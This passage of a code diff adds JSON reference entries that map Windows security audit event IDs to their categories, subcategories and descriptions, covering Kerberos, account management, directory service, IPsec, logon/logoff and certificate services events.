+		"category": "Account Logon",
+		"subcategory": "Kerberos Service Ticket Operations",
+		"event_id": 4770,
+		"description": "A Kerberos service ticket was renewed. ",
+		"full_desc": "4770: A Kerberos service ticket was renewed. "
+	},
+	{
+		"category": "Account Logon",
+		"subcategory": "Kerberos Service Ticket Operations",
+		"event_id": 4773,
+		"description": "A Kerberos service ticket request failed. ",
+		"full_desc": "4773: A Kerberos service ticket request failed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4783,
+		"description": "A basic application group was created. ",
+		"full_desc": "4783: A basic application group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4784,
+		"description": "A basic application group was changed. ",
+		"full_desc": "4784: A basic application group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4785,
+		"description": "A member was added to a basic application group. ",
+		"full_desc": "4785: A member was added to a basic application group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4786,
+		"description": "A member was removed from a basic application group. ",
+		"full_desc": "4786: A member was removed from a basic application group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4787,
+		"description": "A non-member was added to a basic application group. ",
+		"full_desc": "4787: A non-member was added to a basic application group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4788,
+		"description": "A non-member was removed from a basic application group. ",
+		"full_desc": "4788: A non-member was removed from a basic application group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4789,
+		"description": "A basic application group was deleted. ",
+		"full_desc": "4789: A basic application group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4790,
+		"description": "An LDAP query group was created. ",
+		"full_desc": "4790: An LDAP query group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4791,
+		"description": "A basic application group was changed. ",
+		"full_desc": "4791: A basic application group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Application Group Management",
+		"event_id": 4792,
+		"description": "An LDAP query group was deleted. ",
+		"full_desc": "4792: An LDAP query group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Computer Account Management",
+		"event_id": 4741,
+		"description": "A computer account was created. ",
+		"full_desc": "4741: A computer account was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Computer Account Management",
+		"event_id": 4742,
+		"description": "A computer account was changed. ",
+		"full_desc": "4742: A computer account was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Computer Account Management",
+		"event_id": 4743,
+		"description": "A computer account was deleted. ",
+		"full_desc": "4743: A computer account was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4744,
+		"description": "A security-disabled local group was created. ",
+		"full_desc": "4744: A security-disabled local group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4745,
+		"description": "A security-disabled local group was changed. ",
+		"full_desc": "4745: A security-disabled local group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4746,
+		"description": "A member was added to a security-disabled local group. ",
+		"full_desc": "4746: A member was added to a security-disabled local group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4747,
+		"description": "A member was removed from a security-disabled local group. ",
+		"full_desc": "4747: A member was removed from a security-disabled local group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4748,
+		"description": "A security-disabled local group was deleted. ",
+		"full_desc": "4748: A security-disabled local group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4749,
+		"description": "A security-disabled global group was created. ",
+		"full_desc": "4749: A security-disabled global group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4750,
+		"description": "A security-disabled global group was changed. ",
+		"full_desc": "4750: A security-disabled global group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4751,
+		"description": "A member was added to a security-disabled global group. ",
+		"full_desc": "4751: A member was added to a security-disabled global group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4752,
+		"description": "A member was removed from a security-disabled global group. ",
+		"full_desc": "4752: A member was removed from a security-disabled global group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4753,
+		"description": "A security-disabled global group was deleted. ",
+		"full_desc": "4753: A security-disabled global group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4759,
+		"description": "A security-disabled universal group was created. ",
+		"full_desc": "4759: A security-disabled universal group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4760,
+		"description": "A security-disabled universal group was changed. ",
+		"full_desc": "4760: A security-disabled universal group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4761,
+		"description": "A member was added to a security-disabled universal group. ",
+		"full_desc": "4761: A member was added to a security-disabled universal group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Distribution Group Management",
+		"event_id": 4762,
+		"description": "A member was removed from a security-disabled universal group. ",
+		"full_desc": "4762: A member was removed from a security-disabled universal group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Other Account Management Events",
+		"event_id": 4782,
+		"description": "The password hash an account was accessed. ",
+		"full_desc": "4782: The password hash an account was accessed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Other Account Management Events",
+		"event_id": 4793,
+		"description": "The Password Policy Checking API was called. ",
+		"full_desc": "4793: The Password Policy Checking API was called. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4727,
+		"description": "A security-enabled global group was created. ",
+		"full_desc": "4727: A security-enabled global group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4728,
+		"description": "A member was added to a security-enabled global group. ",
+		"full_desc": "4728: A member was added to a security-enabled global group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4729,
+		"description": "A member was removed from a security-enabled global group. ",
+		"full_desc": "4729: A member was removed from a security-enabled global group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4730,
+		"description": "A security-enabled global group was deleted. ",
+		"full_desc": "4730: A security-enabled global group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4731,
+		"description": "A security-enabled local group was created. ",
+		"full_desc": "4731: A security-enabled local group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4732,
+		"description": "A member was added to a security-enabled local group. ",
+		"full_desc": "4732: A member was added to a security-enabled local group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4733,
+		"description": "A member was removed from a security-enabled local group. ",
+		"full_desc": "4733: A member was removed from a security-enabled local group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4734,
+		"description": "A security-enabled local group was deleted. ",
+		"full_desc": "4734: A security-enabled local group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4735,
+		"description": "A security-enabled local group was changed. ",
+		"full_desc": "4735: A security-enabled local group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4737,
+		"description": "A security-enabled global group was changed. ",
+		"full_desc": "4737: A security-enabled global group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4754,
+		"description": "A security-enabled universal group was created. ",
+		"full_desc": "4754: A security-enabled universal group was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4755,
+		"description": "A security-enabled universal group was changed. ",
+		"full_desc": "4755: A security-enabled universal group was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4756,
+		"description": "A member was added to a security-enabled universal group. ",
+		"full_desc": "4756: A member was added to a security-enabled universal group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4757,
+		"description": "A member was removed from a security-enabled universal group. ",
+		"full_desc": "4757: A member was removed from a security-enabled universal group. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4758,
+		"description": "A security-enabled universal group was deleted. ",
+		"full_desc": "4758: A security-enabled universal group was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "Security Group Management",
+		"event_id": 4764,
+		"description": "A group’s type was changed. ",
+		"full_desc": "4764: A group’s type was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4720,
+		"description": "A user account was created. ",
+		"full_desc": "4720: A user account was created. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4722,
+		"description": "A user account was enabled. ",
+		"full_desc": "4722: A user account was enabled. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4723,
+		"description": "An attempt was made to change an account's password. ",
+		"full_desc": "4723: An attempt was made to change an account's password. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4724,
+		"description": "An attempt was made to reset an account's password. ",
+		"full_desc": "4724: An attempt was made to reset an account's password. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4725,
+		"description": "A user account was disabled. ",
+		"full_desc": "4725: A user account was disabled. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4726,
+		"description": "A user account was deleted. ",
+		"full_desc": "4726: A user account was deleted. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4738,
+		"description": "A user account was changed. ",
+		"full_desc": "4738: A user account was changed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4740,
+		"description": "A user account was locked out. ",
+		"full_desc": "4740: A user account was locked out. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4765,
+		"description": "SID History was added to an account. ",
+		"full_desc": "4765: SID History was added to an account. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4766,
+		"description": "An attempt to add SID History to an account failed. ",
+		"full_desc": "4766: An attempt to add SID History to an account failed. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4767,
+		"description": "A user account was unlocked. ",
+		"full_desc": "4767: A user account was unlocked. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4780,
+		"description": "The ACL was set on accounts which are members of administrators groups. ",
+		"full_desc": "4780: The ACL was set on accounts which are members of administrators groups. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4781,
+		"description": "The name of an account was changed: ",
+		"full_desc": "4781: The name of an account was changed: "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 4794,
+		"description": "An attempt was made to set the Directory Services Restore Mode. ",
+		"full_desc": "4794: An attempt was made to set the Directory Services Restore Mode. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 5376,
+		"description": "Credential Manager credentials were backed up. ",
+		"full_desc": "5376: Credential Manager credentials were backed up. "
+	},
+	{
+		"category": "Account Management",
+		"subcategory": "User Account Management",
+		"event_id": 5377,
+		"description": "Credential Manager credentials were restored from a backup. ",
+		"full_desc": "5377: Credential Manager credentials were restored from a backup. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "DPAPI Activity",
+		"event_id": 4692,
+		"description": "Backup of data protection master key was attempted. ",
+		"full_desc": "4692: Backup of data protection master key was attempted. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "DPAPI Activity",
+		"event_id": 4693,
+		"description": "Recovery of data protection master key was attempted. ",
+		"full_desc": "4693: Recovery of data protection master key was attempted. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "DPAPI Activity",
+		"event_id": 4694,
+		"description": "Protection of auditable protected data was attempted. ",
+		"full_desc": "4694: Protection of auditable protected data was attempted. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "DPAPI Activity",
+		"event_id": 4695,
+		"description": "Unprotection of auditable protected data was attempted. ",
+		"full_desc": "4695: Unprotection of auditable protected data was attempted. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "Process Creation",
+		"event_id": 4688,
+		"description": "A new process has been created. ",
+		"full_desc": "4688: A new process has been created. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "Process Creation",
+		"event_id": 4696,
+		"description": "A primary token was assigned to process. ",
+		"full_desc": "4696: A primary token was assigned to process. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "Process Termination",
+		"event_id": 4689,
+		"description": "A process has exited. ",
+		"full_desc": "4689: A process has exited. "
+	},
+	{
+		"category": "Detailed Tracking",
+		"subcategory": "RPC Events",
+		"event_id": 5712,
+		"description": " A Remote Procedure Call (RPC) was attempted. ",
+		"full_desc": "5712:  A Remote Procedure Call (RPC) was attempted. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4928,
+		"description": "An Active Directory replica source naming context was established. ",
+		"full_desc": "4928: An Active Directory replica source naming context was established. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4929,
+		"description": "An Active Directory replica source naming context was removed. ",
+		"full_desc": "4929: An Active Directory replica source naming context was removed. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4930,
+		"description": "An Active Directory replica source naming context was modified. ",
+		"full_desc": "4930: An Active Directory replica source naming context was modified. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4931,
+		"description": "An Active Directory replica destination naming context was modified. ",
+		"full_desc": "4931: An Active Directory replica destination naming context was modified. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4934,
+		"description": "Attributes of an Active Directory object were replicated. ",
+		"full_desc": "4934: Attributes of an Active Directory object were replicated. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4935,
+		"description": "Replication failure begins. ",
+		"full_desc": "4935: Replication failure begins. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4936,
+		"description": "Replication failure ends. ",
+		"full_desc": "4936: Replication failure ends. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Detailed Directory Service Replication",
+		"event_id": 4937,
+		"description": "A lingering object was removed from a replica. ",
+		"full_desc": "4937: A lingering object was removed from a replica. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Access",
+		"event_id": 4662,
+		"description": " An operation was performed on an object. ",
+		"full_desc": "4662:  An operation was performed on an object. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Changes",
+		"event_id": 5136,
+		"description": "A directory service object was modified. ",
+		"full_desc": "5136: A directory service object was modified. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Changes",
+		"event_id": 5137,
+		"description": "A directory service object was created. ",
+		"full_desc": "5137: A directory service object was created. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Changes",
+		"event_id": 5138,
+		"description": "A directory service object was undeleted. ",
+		"full_desc": "5138: A directory service object was undeleted. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Changes",
+		"event_id": 5139,
+		"description": "A directory service object was moved. ",
+		"full_desc": "5139: A directory service object was moved. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Changes",
+		"event_id": 5141,
+		"description": " A directory service object was deleted. ",
+		"full_desc": "5141:  A directory service object was deleted. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Replication",
+		"event_id": 4932,
+		"description": "Synchronization of a replica of an Active Directory naming context has begun. ",
+		"full_desc": "4932: Synchronization of a replica of an Active Directory naming context has begun. "
+	},
+	{
+		"category": "DS Access",
+		"subcategory": "Directory Service Replication",
+		"event_id": 4933,
+		"description": "Synchronization of a replica of an Active Directory naming context has ended. ",
+		"full_desc": "4933: Synchronization of a replica of an Active Directory naming context has ended. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4978,
+		"description": "During extended mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.",
+		"full_desc": "4978: During extended mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4979,
+		"description": "IPsec main mode and extended mode security associations were established.",
+		"full_desc": "4979: IPsec main mode and extended mode security associations were established."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4980,
+		"description": "IPsec main mode and extended mode security associations were established.",
+		"full_desc": "4980: IPsec main mode and extended mode security associations were established."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4981,
+		"description": "IPsec main mode and extended mode security associations were established.",
+		"full_desc": "4981: IPsec main mode and extended mode security associations were established."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4982,
+		"description": "IPsec main mode and extended mode security associations were established.",
+		"full_desc": "4982: IPsec main mode and extended mode security associations were established."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4983,
+		"description": "An IPsec extended mode negotiation failed. The corresponding main mode security association has been deleted.",
+		"full_desc": "4983: An IPsec extended mode negotiation failed. The corresponding main mode security association has been deleted."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Extended Mode",
+		"event_id": 4984,
+		"description": "An IPsec extended mode negotiation failed. The corresponding main mode security association has been deleted.",
+		"full_desc": "4984: An IPsec extended mode negotiation failed. The corresponding main mode security association has been deleted."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4646,
+		"description": "IKE DoS-prevention mode started. ",
+		"full_desc": "4646: IKE DoS-prevention mode started. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4650,
+		"description": "An IPsec main mode security association was established. Extended mode was not enabled. Certificate authentication was not used.",
+		"full_desc": "4650: An IPsec main mode security association was established. Extended mode was not enabled. Certificate authentication was not used."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4651,
+		"description": "An IPsec main mode security association was established. Extended mode was not enabled. A certificate was used for authentication.",
+		"full_desc": "4651: An IPsec main mode security association was established. Extended mode was not enabled. A certificate was used for authentication."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4652,
+		"description": "An IPsec main mode negotiation failed.",
+		"full_desc": "4652: An IPsec main mode negotiation failed."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4653,
+		"description": "An IPsec main mode negotiation failed.",
+		"full_desc": "4653: An IPsec main mode negotiation failed."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4655,
+		"description": "An IPsec main mode security association ended.",
+		"full_desc": "4655: An IPsec main mode security association ended."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 4976,
+		"description": "During main mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.",
+		"full_desc": "4976: During main mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 5049,
+		"description": "An IPsec security association was deleted.",
+		"full_desc": "5049: An IPsec security association was deleted."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Main Mode",
+		"event_id": 5453,
+		"description": "IPsec Policy Agent applied Active Directory storage IPsec policy on the computer.",
+		"full_desc": "5453: IPsec Policy Agent applied Active Directory storage IPsec policy on the computer."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Quick Mode",
+		"event_id": 4654,
+		"description": "An IPsec quick mode negotiation failed.",
+		"full_desc": "4654: An IPsec quick mode negotiation failed."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Quick Mode",
+		"event_id": 4977,
+		"description": "During quick mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.",
+		"full_desc": "4977: During quick mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Quick Mode",
+		"event_id": 5451,
+		"description": "An IPsec quick mode security association was established.",
+		"full_desc": "5451: An IPsec quick mode security association was established."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "IPsec Quick Mode",
+		"event_id": 5452,
+		"description": "An IPsec quick mode security association ended.",
+		"full_desc": "5452: An IPsec quick mode security association ended."
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logoff",
+		"event_id": 4634,
+		"description": " An account was logged off. ",
+		"full_desc": "4634:  An account was logged off. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logoff",
+		"event_id": 4647,
+		"description": " User initiated logoff. ",
+		"full_desc": "4647:  User initiated logoff. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logon",
+		"event_id": 4624,
+		"description": "An account was successfully logged on. ",
+		"full_desc": "4624: An account was successfully logged on. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logon",
+		"event_id": 4625,
+		"description": "An account failed to log on. ",
+		"full_desc": "4625: An account failed to log on. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logon",
+		"event_id": 4648,
+		"description": "A logon was attempted using explicit credentials. ",
+		"full_desc": "4648: A logon was attempted using explicit credentials. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Logon",
+		"event_id": 4675,
+		"description": "SIDs were filtered. ",
+		"full_desc": "4675: SIDs were filtered. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6272,
+		"description": "Network Policy Server granted access to a user. ",
+		"full_desc": "6272: Network Policy Server granted access to a user. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6273,
+		"description": "Network Policy Server denied access to a user. ",
+		"full_desc": "6273: Network Policy Server denied access to a user. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6274,
+		"description": "Network Policy Server discarded the request for a user. ",
+		"full_desc": "6274: Network Policy Server discarded the request for a user. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6275,
+		"description": "Network Policy Server discarded the accounting request for a user. ",
+		"full_desc": "6275: Network Policy Server discarded the accounting request for a user. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6276,
+		"description": "Network Policy Server quarantined a user. ",
+		"full_desc": "6276: Network Policy Server quarantined a user. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6277,
+		"description": "Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy. ",
+		"full_desc": "6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6278,
+		"description": "Network Policy Server granted full access to a user because the host met the defined health policy. ",
+		"full_desc": "6278: Network Policy Server granted full access to a user because the host met the defined health policy. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6279,
+		"description": "Network Policy Server locked the user account due to repeated failed authentication attempts. ",
+		"full_desc": "6279: Network Policy Server locked the user account due to repeated failed authentication attempts. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Network Policy Server",
+		"event_id": 6280,
+		"description": "Network Policy Server unlocked the user account. ",
+		"full_desc": "6280: Network Policy Server unlocked the user account. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4649,
+		"description": "A replay attack was detected. ",
+		"full_desc": "4649: A replay attack was detected. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4778,
+		"description": "A session was reconnected to a Window Station. ",
+		"full_desc": "4778: A session was reconnected to a Window Station. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4779,
+		"description": "A session was disconnected from a Window Station. ",
+		"full_desc": "4779: A session was disconnected from a Window Station. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4800,
+		"description": "The workstation was locked. ",
+		"full_desc": "4800: The workstation was locked. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4801,
+		"description": "The workstation was unlocked. ",
+		"full_desc": "4801: The workstation was unlocked. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4802,
+		"description": "The screen saver was invoked. ",
+		"full_desc": "4802: The screen saver was invoked. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 4803,
+		"description": "The screen saver was dismissed. ",
+		"full_desc": "4803: The screen saver was dismissed. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 5378,
+		"description": "The requested credentials delegation was disallowed by policy. ",
+		"full_desc": "5378: The requested credentials delegation was disallowed by policy. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 5632,
+		"description": "A request was made to authenticate to a wireless network. ",
+		"full_desc": "5632: A request was made to authenticate to a wireless network. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Other Logon/Logoff Events",
+		"event_id": 5633,
+		"description": "A request was made to authenticate to a wired network. ",
+		"full_desc": "5633: A request was made to authenticate to a wired network. "
+	},
+	{
+		"category": "Logon/Logoff",
+		"subcategory": "Special Logon",
+		"event_id": 4964,
+		"description": " Special groups have been assigned to a new logon. ",
+		"full_desc": "4964:  Special groups have been assigned to a new logon. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Application Generated",
+		"event_id": 4665,
+		"description": "An attempt was made to create an application client context. ",
+		"full_desc": "4665: An attempt was made to create an application client context. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Application Generated",
+		"event_id": 4666,
+		"description": "An application attempted an operation: ",
+		"full_desc": "4666: An application attempted an operation: "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Application Generated",
+		"event_id": 4667,
+		"description": "An application client context was deleted. ",
+		"full_desc": "4667: An application client context was deleted. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Application Generated",
+		"event_id": 4668,
+		"description": "An application was initialized. ",
+		"full_desc": "4668: An application was initialized. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4868,
+		"description": "The certificate manager denied a pending certificate request. ",
+		"full_desc": "4868: The certificate manager denied a pending certificate request. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4869,
+		"description": "Certificate Services received a resubmitted certificate request. ",
+		"full_desc": "4869: Certificate Services received a resubmitted certificate request. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4870,
+		"description": "Certificate Services revoked a certificate. ",
+		"full_desc": "4870: Certificate Services revoked a certificate. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4871,
+		"description": "Certificate Services received a request to publish the certificate revocation list (CRL). ",
+		"full_desc": "4871: Certificate Services received a request to publish the certificate revocation list (CRL). "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4872,
+		"description": "Certificate Services published the certificate revocation list (CRL). ",
+		"full_desc": "4872: Certificate Services published the certificate revocation list (CRL). "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4873,
+		"description": "A certificate request extension changed. ",
+		"full_desc": "4873: A certificate request extension changed. "
+	},
+	{
+		"category": "Object Access",
+		"subcategory": "Certification Services",
+		"event_id": 4874,
